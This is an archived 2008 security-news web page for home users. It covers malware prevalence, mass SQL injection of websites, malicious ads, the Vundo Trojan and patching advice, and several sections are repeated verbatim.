Security issues in the news -
3/7/08
With the prevalence of malware on the
internet discussed below, it's vital to keep all web-facing software up
to date, so
that security vulnerabilities cannot be exploited to install malware
during normal browsing of perfectly reputable web sites. With this in
mind, it's alarming that 40% of web users seem to be surfing with
unsafe browsers. Security
Fix.
Still on the 'infected site' theme, the Guardian has an interesting article on 'poisoned' search results at Google, where links in a Google search direct browsers to malicious sites that try to install malware either by the use of exploits or by fooling the user into downloading a Trojan horse by social engineering.
The best way to stay safe against exploits is to stay up to date with the Secunia Software Inspector:
8/5/08
A basic web page consists of text, pictures and links. Web developers add features to a page using programs which run either on the user's computer or on the server. Programs on the server can alter the appearance of a web page according to who visits, and have a page display information particular to a certain visitor.
Both browser-based and server-based web applications may contain security vulnerabilities that can be exploited to infect a computer if a web site is compromised (hacked) or contains compromised third-party content (typically ads from hacked ad servers). Browser-based programs such as Javascript, Java, Flash, Quicktime, Realplayer etc. have all had these vulnerabilities in the past. However, the big story recently has been server-based web infections serving up malware. Malware pushers have been supplying malicious commands to server-based database programs which cause the websites concerned to install malware on visiting computers.
The problem is widespread- with thousands of web sites affected. The big difference when compared to previous attacks is that the web sites concerned have not been hacked- the malicious content is 'injected' into the behind-the-scenes database (SQL) not using a security vulnerability, but by slipping past weak database security checks.
The good news is that exploits served up by infected sites do not seem to affect a fully patched computer. Once again, a good reason to keep up-to-date and use Secunia services to check for vulnerable software.
28/2/08
Malware is becoming more numerous, more prevalent and harder to remove.
Data from Andreas Marx at AV-Test.org on unique malware samples plotted against year, posted on the Sunbelt blog with this comment:
Data on the prevalence of malware on the web from Google.
Google Online Security Blog
The prevalence of malware is partly explained by a tactic recently deployed by malware pushers: injecting malware into advertisements displayed on legitimate sites via third-party ad servers. The Register, Sunbelt Blog
The Google report above also identifies how anti-virus programs are failing to keep up with the growth in malware numbers, as this graph of detection rates shows.
Technical Report (PDF)
It's not only the fact that even that detection rates are not keeping up with the growth in malware that's making removal more difficult: malware is also using more advanced techniques to avoid removal. One of the most egregious culprits is the Vundo/Virtumonde scam Trojan:
Wikipedia
A tool that seems to be having some success in keeping up with Vundo is ComboFix, worth a try in the case of persistent pop-ups for scam anti-virus products that other anti-spyware products just wont remove.
It's worth pointing out that however prevalent malware becomes, it's still easy to avoid by following some simple precautions: don't download programs from untrusted sites, don't open files in emails or IM programs, even if they appear to come from a friend, and keep all software up to date to avoid malware installation through security holes. Use the Secunia Software Inspector below to check for out-of-date and vulnerable software on your computer.
The latest software vulnerability to hit the news (and those slow to update) is in Adobe's Acrobat program. Banner ads are used to serve malicious PDF files that exploit the vulnerability, a tactic mentioned above, so the malware may be encountered on "safe" sites if they happen to carry ads from a compromised third-party ad server. Sunbelt Blog
Security News from 2007
Still on the 'infected site' theme, the Guardian has an interesting article on 'poisoned' search results at Google, where links in a Google search direct browsers to malicious sites that try to install malware either by the use of exploits or by fooling the user into downloading a Trojan horse by social engineering.
The best way to stay safe against exploits is to stay up to date with the Secunia Software Inspector:
8/5/08
A basic web page consists of text, pictures and links. Web developers add features to a page using programs which run either on the user's computer or on the server. Programs on the server can alter the appearance of a web page according to who visits, and have a page display information particular to a certain visitor.
Both browser-based and server-based web applications may contain security vulnerabilities that can be exploited to infect a computer if a web site is compromised (hacked) or contains compromised third-party content (typically ads from hacked ad servers). Browser-based programs such as Javascript, Java, Flash, Quicktime, Realplayer etc. have all had these vulnerabilities in the past. However, the big story recently has been server-based web infections serving up malware. Malware pushers have been supplying malicious commands to server-based database programs which cause the websites concerned to install malware on visiting computers.
The problem is widespread- with thousands of web sites affected. The big difference when compared to previous attacks is that the web sites concerned have not been hacked- the malicious content is 'injected' into the behind-the-scenes database (SQL) not using a security vulnerability, but by slipping past weak database security checks.
Web infection attacks more than
100,000 pages The
Register
Hundreds of Thousands of Microsoft Web Servers Hacked Security Fix
Thousands of More Hacked Websites Targeting Your Passwords Shadowserver
Hundreds of thousands of SQL injections SANS
Mass SQL Injection f-Secure
Hundreds of Thousands of Microsoft Web Servers Hacked Security Fix
Thousands of More Hacked Websites Targeting Your Passwords Shadowserver
Hundreds of thousands of SQL injections SANS
Mass SQL Injection f-Secure
The good news is that exploits served up by infected sites do not seem to affect a fully patched computer. Once again, a good reason to keep up-to-date and use Secunia services to check for vulnerable software.
28/2/08
Malware is becoming more numerous, more prevalent and harder to remove.
Data from Andreas Marx at AV-Test.org on unique malware samples plotted against year, posted on the Sunbelt blog with this comment:
It's worth noting that these
numbers are also increasing because of
variants -- i.e. the same Trojan will be changed sometimes hourly or
daily just to try and fool the scanners. So it's not like there's over
5 million unique pieces of malware. There are many that are variants of
the same piece of malware.
Nevertheless, this is a good representation of the staggering load of malware that anti-malware folks are under. Like most companies, we’re processing gigabytes of malware daily.
Nevertheless, this is a good representation of the staggering load of malware that anti-malware folks are under. Like most companies, we’re processing gigabytes of malware daily.
Data on the prevalence of malware on the web from Google.
It has been over a year and a
half since we started to identify web
pages that infect vulnerable hosts via drive-by downloads, i.e. web
pages that attempt to exploit their visitors by installing and running
malware automatically. During that time we have investigated billions
of URLs and found more than three million unique URLs on over 180,000
web sites automatically installing malware. During the course of our
research, we have investigated not only the prevalence of drive-by
downloads but also how users are being exposed to malware and how it is
being distributed. Our research paper is currently under peer review,
but we are making a technical report [PDF] available now.
Google Online Security Blog
The prevalence of malware is partly explained by a tactic recently deployed by malware pushers: injecting malware into advertisements displayed on legitimate sites via third-party ad servers. The Register, Sunbelt Blog
The Google report above also identifies how anti-virus programs are failing to keep up with the growth in malware numbers, as this graph of detection rates shows.
In what follows, we evaluate the
potential implications of the web malware delivery mechanism
by measuring the detection rates of several well known anti-virus engines 4 . Specifically, we evaluate
the detection rate of each anti-virus engine against the set of suspected malware samples collected
by our infrastructure. Since we can not rely on anti-virus engines, we developed a heuristic to detect
these suspected binaries before subjecting them to the anti-virus scanners. For each inspected URL
via our in-depth verification system we test whether visiting the URL caused the creation of at least
one new process on the virtual machine. For the URLs that satisfy this condition, we simply extract
any binary 5 download(s) from the recorded HTTP response and “flag” them as suspicious.
We applied the above methodology to identify suspicious binaries on a daily basis over a one
month period of April, 2007. We subject each binary for each of the anti-virus scanners using the
latest virus definitions on that day. Then, for an anti-virus engine, the detection rate is simply the
number of detected (flagged) samples divided by the total number of suspicious malware instances
inspected on that day. Figure 15 illustrates the individual detection rates of each of the anti-virus
engines. The graph reveals that the detection capability of the anti-virus engines is lacking, with
an average detection rate of 70% for the best engine. These results are disturbing as they show that
even the best anti-virus engines in the market (armed with their latest definitions) fail to cover a
significant fraction of web malware.
by measuring the detection rates of several well known anti-virus engines 4 . Specifically, we evaluate
the detection rate of each anti-virus engine against the set of suspected malware samples collected
by our infrastructure. Since we can not rely on anti-virus engines, we developed a heuristic to detect
these suspected binaries before subjecting them to the anti-virus scanners. For each inspected URL
via our in-depth verification system we test whether visiting the URL caused the creation of at least
one new process on the virtual machine. For the URLs that satisfy this condition, we simply extract
any binary 5 download(s) from the recorded HTTP response and “flag” them as suspicious.
We applied the above methodology to identify suspicious binaries on a daily basis over a one
month period of April, 2007. We subject each binary for each of the anti-virus scanners using the
latest virus definitions on that day. Then, for an anti-virus engine, the detection rate is simply the
number of detected (flagged) samples divided by the total number of suspicious malware instances
inspected on that day. Figure 15 illustrates the individual detection rates of each of the anti-virus
engines. The graph reveals that the detection capability of the anti-virus engines is lacking, with
an average detection rate of 70% for the best engine. These results are disturbing as they show that
even the best anti-virus engines in the market (armed with their latest definitions) fail to cover a
significant fraction of web malware.
Technical Report (PDF)
It's not only the fact that even that detection rates are not keeping up with the growth in malware that's making removal more difficult: malware is also using more advanced techniques to avoid removal. One of the most egregious culprits is the Vundo/Virtumonde scam Trojan:
Vundo creates a DLL file in the
Windows system32 directory and writes
registry entries, causing Windows to inject the file into winlogon.exe
and many other programs.
Wikipedia
A tool that seems to be having some success in keeping up with Vundo is ComboFix, worth a try in the case of persistent pop-ups for scam anti-virus products that other anti-spyware products just wont remove.
It's worth pointing out that however prevalent malware becomes, it's still easy to avoid by following some simple precautions: don't download programs from untrusted sites, don't open files in emails or IM programs, even if they appear to come from a friend, and keep all software up to date to avoid malware installation through security holes. Use the Secunia Software Inspector below to check for out-of-date and vulnerable software on your computer.
The latest software vulnerability to hit the news (and those slow to update) is in Adobe's Acrobat program. Banner ads are used to serve malicious PDF files that exploit the vulnerability, a tactic mentioned above, so the malware may be encountered on "safe" sites if they happen to carry ads from a compromised third-party ad server. Sunbelt Blog
Security News from 2007